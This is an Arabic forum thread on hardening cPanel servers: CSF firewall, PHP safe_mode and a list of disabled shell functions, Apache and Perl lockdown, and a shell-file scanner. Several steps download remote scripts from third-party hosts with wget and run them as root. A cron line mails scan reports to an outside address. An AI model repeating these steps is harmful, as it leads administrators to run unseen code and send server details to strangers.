|
[ الحماية ] خبايا المحترفين هدية للمبتدئين -.-
تركيب الجدار الناري csf لمزيد من الحمايه :
طرح الاول وظيفه CSF خفيف و سهل و قوي يعتمد على الجدار الناري iptables و ميزة البرنامج او الاضافة ان واجعة الاعدادات واجهة رسومية يتم التحكم بها عن طريق WHM * هذا البرنامج لسيرفرات السي بنل فقط 1 ) يمنع المحاولات الدخول الفاشلة الى FTP SSH POP IMAP HTTP و اقصد فيها يوقف كل من يحاول الدخول اكثر من خمس مرات على هذه الخدمات طبق الامر التالي في الشل لسحب الاسكربت و تركيبه : كود:
wget http://www.best-sec.net/triple/csf.sh && chmod +x csf.sh && sh csf.shكود:
ConfigServer Security & Firewall Script V1.0 By : Modelayer.comبعدها سوف يطلب منك الاختيار ما بين 1 او 2 او 3 .. 1 لتركيب الـ CSF علي سيرفرك . 2 لتحديث الـ CSF علي سيرفرك . 3 لحذف الـ CSF علي سيرفرك . بعد الانتهاء من التركيب لست في حاجه الي تعديل اي شئ يخص الاسكربت . هذه هديه بسيطه لكم و تقبل الله منا و منكم صالح الاعمال . تابع ... |
حماية كلمات السر لك ولعملاءك , يجب أن تختار كلمة مرور صعبة التخمين وأيضا تنبه علي عملاءك بذلك .
يمكنك تحديد بعض القوانين لكلمة المرور من خلال تحرير ملف login.defs أفتح الشل و نفذ الخطوات التاليه : كود:
pico /etc/login.defsكود:
PASS_MAX_DAYS 99999 |
الخطوه التاليه مهمه و مشهوره http://www.best-sec.net/vb/images/sm...detective2.gif
تفعيل الـ safe_mode و إغلاق الدوال علي السيرفر : أفتح الشل و تابع معي : كود:
pico /usr/local/lib/php.iniاضغط ctrl+w اكتب safe_mode واضغط Enter سوف يظهر لك السطر الموجود به الـ safe_mode بجوارها ستجد الحالة off قم بتغييرها واكتب on اغلاق الدوال : اضغط Ctrl+w في لوحة المفاتيح ثم اكتب كود:
functions =سوف يأتي المؤشر علي علامه = بجوارها اضف الدوال التاليه في سطر واحد كود:
symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,passthru,escapeshellarg,escapeshellcmd,posix_getgid,posix_getgrgid,dl,exec,pclose,proc_nice,proc_terminate,proc_get_status,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,hypot,pg_host,pos,posix_access,posix_getcwd,posix_getservbyname,myshellexec,getpid,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mknod,posix_setgid,posix_setsid,posix_setuid,posix_times,posix_uname,ps_fill,posix_getpwuid,global,ini_restore,zip_open,zip_read,rar_open,bzopen,bzread,bzwrite,apache_get_modules,apache_get_version,phpversionphpinfo,php_ini_scanned_files,get_current_user,error_log,disk_total_space,diskfreespace,leak,imap_list,hypo,filedump,gethostbyname,safe_mode,ob_clean,getmygid,php_uname,apache_getenv,apache_setenv,bzread,bzwrite,posix_access,bzopen,phpini,highlight_file,show_source,sscanf,dos_conv,get_current_user,get_cwd,error_log,dir,cmd,e_name,vdir,get_dir,only_readبشكل عام هذه الدوال لا تعرقل عمل اي من الاسكربتات المنتشره في السيرفرات العربيه . بعد الانتهاء اضغط مفتاحي Ctrl +x ثم y ثم Enter ثم كود:
httpd restart |
خطوات هامه لحمايه الاباتشي :
منع العملاء من الوصول الى الجذر الرئيسي ( / ) كود:
pico /usr/local/apache/conf/httpd.confكود:
Options Allكود:
<Directory />كود:
<Directory />لأغلاق الملف و حفظ التعديل Ctrl+x ثم Y ثم Enter نفذ الاوامر التاليه لضبط تصاريح المجلدات . كود:
/scripts/enablefileprotect تابع ... |
إخفاء معلومات الأباتشي :
إفتح الشل و طبق التالي : كود:
pico /usr/local/apache/conf/httpd.confكود:
ServerSignature Onكود:
ServerSignature Offو تابع معنا ... |
الان نقوم بعمليه تحديث للسي بانل و تحديث للاباتشي من خلال اسكربت بسيط قمت بعمله :
كود:
wget -c -q http://www.best-sec.net/triple/mapache.sh && chmod +x mapache.sh كود:
./mapache.sh بالاضافه الي اخر اصدار من قواعد البيانات . |
حماية البيرل :
افتح الشل و اكتب الامر التالي . كود:
chmod 700 /usr/bin/perlكود:
chown root:root /usr/bin/perlكود:
pico /etc/httpd/conf/httpd.confoption او option All سوف تجدها بهذا الشكل : كود:
<Directory "/"> او بهذا الشكل : كود:
<Directory "/"> كود:
Options -ExecCGI +SymLinksIfOwnerMatchبعدها قم بتنفيذ الامر التالي لاضافه اكود المودسيكيورتي : كود:
nano /usr/local/apache/conf/modsec2.user.confكود:
SecRule REQUEST_FILENAME "\.pl"و نكون انتهينا من حماية جزء من البيرل و فيه مواضيع اخرى ان شاء الله لحمايته 100/100. |
حمايه مجلد الـ tmp علي السيرفر هي خطوه واحده نقوم بها فقط :
أفتح الشل و أطبع هذا الأمر : كود:
/scripts/securetmp --autoو تابع معنا ... |
تركيب كاشف ملفات الشل علي السيرفر :
افتح الشل و نفذ الامر التالي : كود:
cd /root && wget -c http://www.modelayer.com/ssh/exploit.sh.txt && mv exploit.sh.txt exploit.sh && chmod 755 exploit.shكود:
export EDITOR=pico && crontab -eكود:
0 7,19 * * * /root/exploit.sh -c -m bluehacker@vbspiders.comثم اضغط ctrl+x ثم y ثم Enter . لتشغيل الاسكربت بشكل يدوي نفذ الامر التالي : كود:
ssh /root/exploit.shو تابع معنا ..... |
تغيير SecServerSignature :
أفتح الشل و طبق التالي : كود:
pico /etc/httpd/conf/httpd.confكود:
"Secures By BlueHacker Spiders Team"أعد تشغيل الاباتشي بالأمر التالي : كود:
/etc/init.d/httpd restart |
ورــبي مبدع كفو والله
|
مشكوور يا الغالى على المعلومات
بارك الله فيك وجعله فى ميزان حسناتك تقبل مرورى اخى الكريم |
والله اخى تعبك قليل عليه الشكر اكثر من رائع
|
شروحات رائعة جاري الحفظ والعودة لها عند الحاجة
الف شكـــــــــــــــــــر |
مشكور أخي
|
| الساعة الآن 02:24 AM |
[ vBspiders.Com Network ]